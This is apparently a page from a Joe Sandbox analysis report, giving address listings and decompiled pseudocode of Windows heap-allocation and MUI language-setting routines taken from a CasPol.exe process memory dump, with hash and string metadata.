                                                                        0x013da42d
                                                                        0x013da42d
                                                                        0x013da42d
                                                                        0x013da42d
                                                                        0x013da436
                                                                        0x013da43a
                                                                        0x013da609
                                                                        0x013da60d
                                                                        0x013da612
                                                                        0x013da616
                                                                        0x013da61a
                                                                        0x01421e57
                                                                        0x01421e59
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01421e5f
                                                                        0x013da620
                                                                        0x013da627
                                                                        0x01421e64
                                                                        0x01421e66
                                                                        0x01421e6c
                                                                        0x01421e72
                                                                        0x01421e76
                                                                        0x01421e95
                                                                        0x01421e9a
                                                                        0x01421e78
                                                                        0x01421e8d
                                                                        0x01421e92
                                                                        0x01421ea0
                                                                        0x01421ea5
                                                                        0x01421eaa
                                                                        0x01421eb2
                                                                        0x01421eb6
                                                                        0x01421eb9
                                                                        0x01421eb9
                                                                        0x01421ebe
                                                                        0x01421ec2
                                                                        0x01421ec2
                                                                        0x01421e66
                                                                        0x013da62d
                                                                        0x013da633
                                                                        0x013da636
                                                                        0x013da63a
                                                                        0x013da63c
                                                                        0x013da640
                                                                        0x013da642
                                                                        0x013da644
                                                                        0x013da644
                                                                        0x013da644
                                                                        0x013da64d
                                                                        0x013da64d
                                                                        0x013da651
                                                                        0x013da655
                                                                        0x01421eca
                                                                        0x01421ed1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01421ed7
                                                                        0x00000000
                                                                        0x013da65b
                                                                        0x013da669
                                                                        0x013da66e
                                                                        0x013da670
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013da676
                                                                        0x013da67b
                                                                        0x013da680
                                                                        0x013da682
                                                                        0x01421f1a
                                                                        0x013da688
                                                                        0x013da688
                                                                        0x013da688
                                                                        0x013da68a
                                                                        0x013da68d
                                                                        0x01421f24
                                                                        0x01421f2a
                                                                        0x01421f31
                                                                        0x01421f43
                                                                        0x01421f43
                                                                        0x01421f31
                                                                        0x013da693
                                                                        0x013da697
                                                                        0x013da69d
                                                                        0x013da6a0
                                                                        0x013da6a6
                                                                        0x013da6a8
                                                                        0x013da6a8
                                                                        0x013da6a8
                                                                        0x013da6a8
                                                                        0x013da6b2
                                                                        0x013da6b7
                                                                        0x013da6c1
                                                                        0x013da6c6
                                                                        0x013da6d2
                                                                        0x013da6d9
                                                                        0x013da6e3
                                                                        0x013da6e6
                                                                        0x013da6eb
                                                                        0x013da6ed
                                                                        0x013da6ed
                                                                        0x013da6ed
                                                                        0x013da6ed
                                                                        0x013da6f3
                                                                        0x013da6f8
                                                                        0x013da702
                                                                        0x013da70a
                                                                        0x013da70e
                                                                        0x013da71a
                                                                        0x013da71e
                                                                        0x01421fcb
                                                                        0x01421fcf
                                                                        0x01421fdd
                                                                        0x01421fe3
                                                                        0x01421fe3
                                                                        0x013da724
                                                                        0x013da728
                                                                        0x013da72a
                                                                        0x013da72d
                                                                        0x013da737
                                                                        0x013da73a
                                                                        0x013da73c
                                                                        0x013da742
                                                                        0x013da748
                                                                        0x01421f4d
                                                                        0x01421f50
                                                                        0x01421f56
                                                                        0x01421f5c
                                                                        0x01421f5f
                                                                        0x01421f7e
                                                                        0x01421f83
                                                                        0x01421f61
                                                                        0x01421f76
                                                                        0x01421f7b
                                                                        0x01421f89
                                                                        0x01421f8e
                                                                        0x01421f93
                                                                        0x01421f94
                                                                        0x01421f9a
                                                                        0x01421f9c
                                                                        0x01421f9e
                                                                        0x01421fa1
                                                                        0x01421fa1
                                                                        0x01421fa6
                                                                        0x01421fa6
                                                                        0x01421f50
                                                                        0x013da74e
                                                                        0x013da751
                                                                        0x013da754
                                                                        0x013da75d
                                                                        0x013da75e
                                                                        0x013da762
                                                                        0x013da767
                                                                        0x01421faf
                                                                        0x01421fb0
                                                                        0x01421fb9
                                                                        0x01421fbe
                                                                        0x01421fc2
                                                                        0x01421fc2
                                                                        0x013da76d
                                                                        0x013da76d
                                                                        0x013da775
                                                                        0x013da778
                                                                        0x013da77d
                                                                        0x013da77d
                                                                        0x013da71e
                                                                        0x013da782
                                                                        0x013da787
                                                                        0x013da789
                                                                        0x01421ff3
                                                                        0x013da78f
                                                                        0x013da78f
                                                                        0x013da78f
                                                                        0x013da791
                                                                        0x013da794
                                                                        0x01421ffd
                                                                        0x01422006
                                                                        0x0142200c
                                                                        0x01422017
                                                                        0x01422019
                                                                        0x01422024
                                                                        0x01422024
                                                                        0x01422024
                                                                        0x01422047
                                                                        0x01422047
                                                                        0x0142200c
                                                                        0x013da79a
                                                                        0x013da79f
                                                                        0x013da7a4
                                                                        0x013da7a9
                                                                        0x013da7ab
                                                                        0x0142205a
                                                                        0x013da7b1
                                                                        0x013da7b1
                                                                        0x013da7b1
                                                                        0x013da7b3
                                                                        0x013da7b6
                                                                        0x00000000
                                                                        0x013da7bc
                                                                        0x01422066
                                                                        0x01422068
                                                                        0x01422073
                                                                        0x01422073
                                                                        0x01422073
                                                                        0x01422078
                                                                        0x01422079
                                                                        0x0142207d
                                                                        0x00000000
                                                                        0x0142207d
                                                                        0x013da7b6
                                                                        0x013da440
                                                                        0x013da440
                                                                        0x013da440
                                                                        0x013da446
                                                                        0x013da44c
                                                                        0x013da44f
                                                                        0x013da453
                                                                        0x013da455
                                                                        0x014220b3
                                                                        0x014220b9
                                                                        0x014220b9
                                                                        0x013da45d
                                                                        0x013da460
                                                                        0x013da464
                                                                        0x013da466
                                                                        0x013da46b
                                                                        0x013da46f
                                                                        0x013da471
                                                                        0x013da471
                                                                        0x013da471
                                                                        0x013da474
                                                                        0x013da479
                                                                        0x013da47d
                                                                        0x013da47f
                                                                        0x01422229
                                                                        0x0142222f
                                                                        0x013da3c8
                                                                        0x013da3c8
                                                                        0x013da3ca
                                                                        0x013da3ca
                                                                        0x00000000
                                                                        0x013da3ca
                                                                        0x01422235
                                                                        0x0142223a
                                                                        0x0142223a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01422240
                                                                        0x01422246
                                                                        0x0142224a
                                                                        0x01422269
                                                                        0x0142226e
                                                                        0x0142224c
                                                                        0x01422261
                                                                        0x01422266
                                                                        0x01422274
                                                                        0x01422279
                                                                        0x0142227e
                                                                        0x01422286
                                                                        0x01422288
                                                                        0x0142228d
                                                                        0x0142228d
                                                                        0x01422292
                                                                        0x01422292
                                                                        0x01422295
                                                                        0x01422295
                                                                        0x00000000
                                                                        0x01422295
                                                                        0x013da485
                                                                        0x013da489
                                                                        0x013da48b
                                                                        0x013da48f
                                                                        0x013da493
                                                                        0x013da497
                                                                        0x013da49b
                                                                        0x013da4bb
                                                                        0x013da4bb
                                                                        0x013da4bd
                                                                        0x013da4ff
                                                                        0x013da4ff
                                                                        0x013da501
                                                                        0x013da505
                                                                        0x013da50f
                                                                        0x013da517
                                                                        0x013da51b
                                                                        0x013da527
                                                                        0x013da52b
                                                                        0x01422182
                                                                        0x01422185
                                                                        0x01422193
                                                                        0x01422199
                                                                        0x01422199
                                                                        0x013da531
                                                                        0x013da535
                                                                        0x013da538
                                                                        0x013da548
                                                                        0x013da54b
                                                                        0x013da54d
                                                                        0x013da553
                                                                        0x013da559
                                                                        0x01422100
                                                                        0x01422103
                                                                        0x01422109
                                                                        0x0142210f
                                                                        0x01422112
                                                                        0x01422131
                                                                        0x01422136
                                                                        0x01422114
                                                                        0x01422129
                                                                        0x0142212e
                                                                        0x0142213c
                                                                        0x01422141
                                                                        0x01422147
                                                                        0x0142214d
                                                                        0x01422151
                                                                        0x01422154
                                                                        0x01422154
                                                                        0x01422159
                                                                        0x01422159
                                                                        0x01422103
                                                                        0x013da55f
                                                                        0x013da562
                                                                        0x013da565
                                                                        0x013da567
                                                                        0x01422162
                                                                        0x013da56d
                                                                        0x013da574
                                                                        0x013da575
                                                                        0x013da579
                                                                        0x013da57e
                                                                        0x01422169
                                                                        0x0142216a
                                                                        0x01422170
                                                                        0x01422175
                                                                        0x01422179
                                                                        0x01422179
                                                                        0x013da57e
                                                                        0x013da584
                                                                        0x013da58f
                                                                        0x013da58f
                                                                        0x013da52b
                                                                        0x013da5ad
                                                                        0x013da5bc
                                                                        0x013da5c1
                                                                        0x013da5c6
                                                                        0x013da5cb
                                                                        0x013da5cd
                                                                        0x014221a9
                                                                        0x013da5d3
                                                                        0x013da5d3
                                                                        0x013da5d3
                                                                        0x013da5d5
                                                                        0x013da5d8
                                                                        0x014221b3
                                                                        0x014221bc
                                                                        0x014221c2
                                                                        0x014221cd
                                                                        0x014221cf
                                                                        0x014221da
                                                                        0x014221da
                                                                        0x014221da
                                                                        0x014221f7
                                                                        0x014221f7
                                                                        0x014221c2
                                                                        0x013da5de
                                                                        0x013da5e3
                                                                        0x013da5e8
                                                                        0x013da5ea
                                                                        0x0142220a
                                                                        0x013da5f0
                                                                        0x013da5f0
                                                                        0x013da5f0
                                                                        0x013da5f2
                                                                        0x013da5f5
                                                                        0x01422219
                                                                        0x0142221b
                                                                        0x0142208c
                                                                        0x0142208c
                                                                        0x0142208c
                                                                        0x01422095
                                                                        0x01422096
                                                                        0x01422097
                                                                        0x01422098
                                                                        0x014220a4
                                                                        0x014220a5
                                                                        0x014220a9
                                                                        0x014220a9
                                                                        0x00000000
                                                                        0x013da5f5
                                                                        0x013da4bf
                                                                        0x013da4d3
                                                                        0x013da4d8
                                                                        0x013da4da
                                                                        0x01421ede
                                                                        0x01421ede
                                                                        0x01421ee4
                                                                        0x01421ee9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01421f07
                                                                        0x00000000
                                                                        0x01421f07
                                                                        0x013da4e0
                                                                        0x013da4e5
                                                                        0x013da4e7
                                                                        0x014220cb
                                                                        0x013da4ed
                                                                        0x013da4ed
                                                                        0x013da4ed
                                                                        0x013da4f2
                                                                        0x013da4f5
                                                                        0x014220d5
                                                                        0x014220de
                                                                        0x014220e4
                                                                        0x014220f6
                                                                        0x014220f6
                                                                        0x014220e4
                                                                        0x013da4fb
                                                                        0x00000000
                                                                        0x013da4fb
                                                                        0x013da4a1
                                                                        0x013da4a4
                                                                        0x013da4a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013da4aa
                                                                        0x013da4ac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013da4b2
                                                                        0x013da4b5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013da4b5
                                                                        0x013da43a
                                                                        0x013da340
                                                                        0x013da346
                                                                        0x013da600
                                                                        0x00000000
                                                                        0x013da600
                                                                        0x013da34f
                                                                        0x013da351
                                                                        0x013da358
                                                                        0x013da3c6
                                                                        0x00000000
                                                                        0x013da371
                                                                        0x013da37a
                                                                        0x013da37f
                                                                        0x013da382
                                                                        0x013da384
                                                                        0x013da394
                                                                        0x00000000
                                                                        0x013da396
                                                                        0x013da399
                                                                        0x013da3a7
                                                                        0x013da3b0
                                                                        0x013da3b4
                                                                        0x013da3bb
                                                                        0x013da3d2
                                                                        0x013da3da
                                                                        0x013da3df
                                                                        0x013da3e1
                                                                        0x013da3e5
                                                                        0x013da3ea
                                                                        0x013da3f0
                                                                        0x013da3f0
                                                                        0x013da3e1
                                                                        0x00000000
                                                                        0x013da3bb
                                                                        0x013da394

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-523794902
                                                                        • Opcode ID: 176a6c6e6acf5cc8c34c16f9b98620bea6320cc929ddae10549fa431bed34868
                                                                        • Instruction ID: 28e4ec4f07067abe8bd84ef0266e21406e0a62dda3106cb8b2ccc260e21cac59
                                                                        • Opcode Fuzzy Hash: 176a6c6e6acf5cc8c34c16f9b98620bea6320cc929ddae10549fa431bed34868
                                                                        • Instruction Fuzzy Hash: BB4211722083819FD715CF28D984B2BBBE5FF88608F44496EF5868B361DB74D981CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01472D82 Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E01472D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1490e80);
				E0140D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E013B40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E014730C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E013BB150();
						} else {
							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E013BB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E013CEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01474496(_t181, 0);
						_t177 = L013D4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E014749A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0146FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E013B1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E013E16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01474496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x14a6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x14a6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x14a6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0145D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E013BB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E013BB150("Just allocated block at %p for %Ix bytes\n",  *0x14a6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x14a6378 = 1;
									 *0x14a60c0 = 0;
									asm("int3");
									 *0x14a6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x14a5708; // 0x0
					 *0x14ab1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0140D130(0, _t177, _t181);
				}
			}





















                                                                        0x01472d82
                                                                        0x01472d84
                                                                        0x01472d89
                                                                        0x01472d8e
                                                                        0x01472d90
                                                                        0x01472d92
                                                                        0x01472d97
                                                                        0x01472d9a
                                                                        0x01472da4
                                                                        0x01472dc0
                                                                        0x01472dc3
                                                                        0x01472dd1
                                                                        0x01472dd6
                                                                        0x01472dd8
                                                                        0x014730a7
                                                                        0x014730a7
                                                                        0x014730aa
                                                                        0x014730aa
                                                                        0x014730ad
                                                                        0x014730b4
                                                                        0x00000000
                                                                        0x014730b9
                                                                        0x01472de3
                                                                        0x01472de8
                                                                        0x01472deb
                                                                        0x01472dee
                                                                        0x01472df1
                                                                        0x01472df3
                                                                        0x01472dfb
                                                                        0x01472dfb
                                                                        0x01472df5
                                                                        0x01472df5
                                                                        0x01472df5
                                                                        0x01472e04
                                                                        0x01472e0a
                                                                        0x01472e0d
                                                                        0x01472e11
                                                                        0x01472e11
                                                                        0x01472e12
                                                                        0x01472e15
                                                                        0x01472e18
                                                                        0x01472e1a
                                                                        0x01473027
                                                                        0x01473027
                                                                        0x0147302d
                                                                        0x01473030
                                                                        0x0147304f
                                                                        0x01473054
                                                                        0x01473032
                                                                        0x01473047
                                                                        0x0147304c
                                                                        0x0147305a
                                                                        0x01473063
                                                                        0x00000000
                                                                        0x01472e20
                                                                        0x01472e20
                                                                        0x01472e23
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01472e29
                                                                        0x01472e2b
                                                                        0x01472e47
                                                                        0x01472e2d
                                                                        0x01472e33
                                                                        0x01472e38
                                                                        0x01472e3f
                                                                        0x01472e42
                                                                        0x01472e42
                                                                        0x01472e4e
                                                                        0x01472e5d
                                                                        0x01472e5f
                                                                        0x01472e62
                                                                        0x01472e66
                                                                        0x01472e6b
                                                                        0x01472e6d
                                                                        0x00000000
                                                                        0x01472e73
                                                                        0x01472e73
                                                                        0x01472e76
                                                                        0x01472e7a
                                                                        0x01472e83
                                                                        0x01472e83
                                                                        0x01472e83
                                                                        0x01472e85
                                                                        0x01472e87
                                                                        0x01472e8a
                                                                        0x01472e8d
                                                                        0x01472e92
                                                                        0x01472e9c
                                                                        0x01472e9f
                                                                        0x01472ea1
                                                                        0x01472ea2
                                                                        0x01472ea6
                                                                        0x01472ea6
                                                                        0x01472e9f
                                                                        0x01472eab
                                                                        0x01472eaf
                                                                        0x01472edf
                                                                        0x01472ee2
                                                                        0x01472ee5
                                                                        0x01472eb1
                                                                        0x01472eb3
                                                                        0x01472eb8
                                                                        0x01472ebd
                                                                        0x01472ec4
                                                                        0x01472ed6
                                                                        0x01472ec6
                                                                        0x01472ec7
                                                                        0x01472ecc
                                                                        0x01472ecf
                                                                        0x01472ed2
                                                                        0x01472ed2
                                                                        0x01472ed9
                                                                        0x01472ed9
                                                                        0x01472ee8
                                                                        0x01472eeb
                                                                        0x01472eef
                                                                        0x01472ef2
                                                                        0x01472efe
                                                                        0x01472f04
                                                                        0x01472f04
                                                                        0x01472f04
                                                                        0x01472f06
                                                                        0x01472f0d
                                                                        0x01472f0f
                                                                        0x01472f13
                                                                        0x01472f13
                                                                        0x01472f1b
                                                                        0x01472f21
                                                                        0x01472f27
                                                                        0x01472f95
                                                                        0x01472f98
                                                                        0x01472f9b
                                                                        0x01472fa0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01472fa6
                                                                        0x01472fa9
                                                                        0x01472fac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01472fb2
                                                                        0x01472fb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01472fc3
                                                                        0x01472fca
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01472fd0
                                                                        0x01472fd6
                                                                        0x01472fd9
                                                                        0x01472ff8
                                                                        0x01472ffd
                                                                        0x01472fdb
                                                                        0x01472ff0
                                                                        0x01472ff5
                                                                        0x0147300e
                                                                        0x0147300f
                                                                        0x0147301a
                                                                        0x00000000
                                                                        0x01472f29
                                                                        0x01472f29
                                                                        0x01472f2c
                                                                        0x01472f4b
                                                                        0x01472f50
                                                                        0x01472f2e
                                                                        0x01472f43
                                                                        0x01472f48
                                                                        0x01472f56
                                                                        0x01472f64
                                                                        0x01472f6c
                                                                        0x01472f6c
                                                                        0x01472f72
                                                                        0x01472f76
                                                                        0x01472f7c
                                                                        0x01472f83
                                                                        0x01472f89
                                                                        0x01472f8a
                                                                        0x01472f8a
                                                                        0x00000000
                                                                        0x01472f76
                                                                        0x01472f27
                                                                        0x01472e6d
                                                                        0x01472da6
                                                                        0x01472dab
                                                                        0x01472db3
                                                                        0x01472db9
                                                                        0x014730bc
                                                                        0x014730c1
                                                                        0x014730c1

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                        • API String ID: 0-1745908468
                                                                        • Opcode ID: 792700cdff80609c220cdde37f858b66541aec078b33fa0e111b99c97ac9f295
                                                                        • Instruction ID: e21e9cdde5cc45ffd74bd8a4e55f490c55a4e09948ba3c39152ce4e11571e1be
                                                                        • Opcode Fuzzy Hash: 792700cdff80609c220cdde37f858b66541aec078b33fa0e111b99c97ac9f295
                                                                        • Instruction Fuzzy Hash: 74912171A00681DFDB22DFA9C454AEEBFF2FF58614F08801EE5465B7A1C7769842DB00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013C3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E013C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E013C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E013C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E013C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E013C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E013C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L013D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E013FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01401370(_t276, 0x1394e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E013FBB40(0,  &_v68, _t170);
									if(L013C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E013FBB40(_t257,  &_v68, _t243);
								if(L013C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01401370(_t278, 0x1394e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
